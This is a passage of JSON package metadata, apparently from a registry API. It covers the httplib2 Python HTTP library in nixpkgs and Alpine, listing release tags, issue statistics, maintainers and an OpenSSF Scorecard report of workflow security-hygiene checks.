2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T13:16:28.741Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python310Packages.httplib2?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python310Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python310Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python310Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T11:37:11.797Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":3335,"html_url":null,"role":null,"created_at":"2026-03-04T18:26:30.511Z","updated_at":"2026-03-04T18:26:30.511Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2166},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-08-25T05:04:32.337Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":6083163,"name":"py3-httplib2","ecosystem":"alpine","description":"Python HTTP client library (for python3)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2019-01-21T23:15:19.000Z","latest_release_published_at":"2019-01-21T23:15:19.000Z","latest_release_number":"0.12.0-r0","last_synced_at":"2026-03-08T18:15:08.600Z","created_at":"2023-01-31T20:00:51.791Z","updated_at":"2026-08-21T14:22:35.401Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.9/main/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using 